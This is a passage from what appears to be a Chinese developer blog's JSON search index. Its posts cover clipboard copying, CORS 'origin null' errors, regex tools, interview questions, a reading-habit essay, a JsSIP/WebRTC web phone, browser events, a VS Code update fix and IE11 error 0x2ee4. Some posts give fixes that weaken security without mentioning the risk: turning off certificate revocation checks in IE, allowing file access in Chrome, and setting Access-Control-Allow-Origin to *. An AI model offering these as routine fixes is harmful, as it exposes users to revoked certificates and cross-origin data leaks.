如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","title":"前端剪贴板复制功能实现原理"},{"content":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形势的跨域请求。而最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个作为彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","permalink":"https://wdd.js.org/posts/2018/03/origin-null-is-not-allowed/","summary":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形势的跨域请求。而最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个作为彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","title":"Chrome本地跨域origin-null-is-not-allowed问题分析与解决方案"},{"content":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","permalink":"https://wdd.js.org/posts/2018/02/regex-online-tools/","summary":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","title":"正则表达式在线工具集合"},{"content":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.3.10. 请问下面的写法问题在哪? console.log(1) (function(){ console.log(1) })() 1.3.11. 请问s.length是多少,s[2]是多少 var s = [] s[3] = 4 s.length ? s[2] ? 1.3.12. 说说你对setTimeout的深入理解? setTimeout(function(){ console.log(\u0026#39;hi\u0026#39;) }, 1000) 1.3.13. 解释闭包概念及其作用 1.3.14. 如何理解js 函数first class的概念? 1.3.15. 函数有哪些调用方式?不同this的会指向哪里? 1.3.16. applly和call有什么区别? 1.3.17. 函数的length属性的代表什么? 1.3.18. 有用过哪些js编程风格 1.3.19. 如何理解EventLoop? 1.3.20. 使用过哪些构建工具?各有什么优缺点? 1.4. 其它 1.4.1. 平时使用什么搜索引擎查资料? 1.4.2. 对翻墙有什么看法?如何翻墙? 1.4.3. 个人有没有技术博客,地址是什么? 1.4.4. github上有没有项目? 1.5. 网络相关 1.5.1. 请求状态码 1xx,2xx,3xx,4xx,5xx分别有什么含义? 1.5.2. 发送某些post请求时,有时会多一些options请求,请问这是为什么? 1.5.3. http报文有哪些组成部分? 1.5.4. http端到端首部和逐跳首部有什么区别? 1.5.5. http与https在同时使用时,有什么注意点? 1.5.6. http, tcp, udp, websocket,分别位于7层网络的那一层?tcp和udp有什么不同? 2. 编码题 2.1. 写一个函数,返回一个数组中所有元素被第一个元素除后的结果 2.2. 写一个函数,来判断变量是否是数组,至少使用两种写法 2.3. 写一个函数,将秒转化成时分秒格式,如80转化成:00:01:20 写一个函数,将对象中属性值为\u0026rsquo;\u0026rsquo;, undefined, null的属性删除掉 // 处理前 var obj = { name: \u0026#39;wdd\u0026#39;, address: { code: \u0026#39;\u0026#39;, tt: null, age: 1 }, ss: [], vv: undefined } // 处理后 { name: \u0026#39;wdd\u0026#39;, address: { age: 1 }, ss: [] } 3. 翻译题 Aggregation operations process data records and return computed results. Aggregation operations group values from multiple documents together, and can perform a variety of operations on the grouped data to return a single result. MongoDB provides three ways to perform aggregation: the aggregation pipeline, the map-reduce function, and single purpose aggregation methods.\n","permalink":"https://wdd.js.org/posts/2018/02/front-end-interview-handbook/","summary":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.","title":"前端面试和笔试题目"},{"content":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。\n","permalink":"https://wdd.js.org/posts/2018/02/small-is-better-than-big/","summary":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。","title":"small is better than big 我的读书方法论"},{"content":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.com\u0026#39;, password : \u0026#39;superpassword\u0026#39; }; var ua = new JsSIP.UA(configuration); ua.start(); // Register callbacks to desired call events var eventHandlers = { \u0026#39;progress\u0026#39;: function(e) { console.log(\u0026#39;call is in progress\u0026#39;); }, \u0026#39;failed\u0026#39;: function(e) { console.log(\u0026#39;call failed with cause: \u0026#39;+ e.data.cause); }, \u0026#39;ended\u0026#39;: function(e) { console.log(\u0026#39;call ended with cause: \u0026#39;+ e.data.cause); }, \u0026#39;confirmed\u0026#39;: function(e) { console.log(\u0026#39;call confirmed\u0026#39;); } }; var options = { \u0026#39;eventHandlers\u0026#39; : eventHandlers, \u0026#39;mediaConstraints\u0026#39; : { \u0026#39;audio\u0026#39;: true, \u0026#39;video\u0026#39;: true } }; var session = ua.call(\u0026#39;sip:bob@example.com\u0026#39;, options); 2.2 SIP.js sip.js项目实际是fork自jsSIP的,这里主要介绍它的服务端支持情况。其他接口自己自行查阅\nFreeSWITCH Asterisk OnSIP FreeSWITCH Legacy 3. 平台考量 由于WebRTC对浏览器有较高的要求,你可以看看下图,哪些浏览器支持WebRTC, 所有IE浏览器都不行,chrome系支持情况不错。\n3.1 考量标准 跨平台 兼容性 体积 集成性 硬件要求 开发成本 3.2 考量表格 种类 适用平台 优点 缺点 基于electron开发的桌面客户端 window, mac, linux 跨平台,兼容好 要下载安装,体积大(压缩后至少48MB),对电脑性能有要求 开发js sdk 现代浏览器 体积小,容易第三方集成 兼容差(因为涉及到webRTC, IE11以及以都不行,对宿主环境要求高),客户集成需要开发量 开发谷歌浏览器扩展 谷歌浏览器 体积小 兼容差(仅限类chrome浏览器) 4 参考文档 and 延伸阅读 and 动手实践 Js SIP Getting Started 120行代码实现 浏览器WebRTC视频聊天 SIP协议状态码: 5 常见问题 422: \u0026ldquo;Session Interval Too Small\u0026rdquo; jsSIP默认携带Session-Expires: 90的头部信息,如果这个超时字段小于服务端的设定值,那么就会得到如下422的响应。参见SIP协议状态码:, 可以在call请求中设置sessionTimersExpires, 使其超过服务端的设定值即可\ncall(targer, options ) option.sessionTimersExpires Number (in seconds) for the default Session Timers interval (default value is 90, do not set a lower value). 6 最后,你我共勉 ","permalink":"https://wdd.js.org/posts/2018/02/webrtc-web-sip-phone/","summary":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.","title":"基于 WebRTC 构建 Web SIP Phone"},{"content":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/02/useful-browser-events/","summary":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.","title":"不常用却很有妙用的事件及方法"},{"content":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。\n4. 参考 joaomoreno commented on Feb 7, 2017 • edited ","permalink":"https://wdd.js.org/posts/2018/02/mac-vscode-update-permission-denied/","summary":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。","title":"mac vscode 更新失败 Permission denied解决办法"},{"content":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就将一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POTST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发型商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 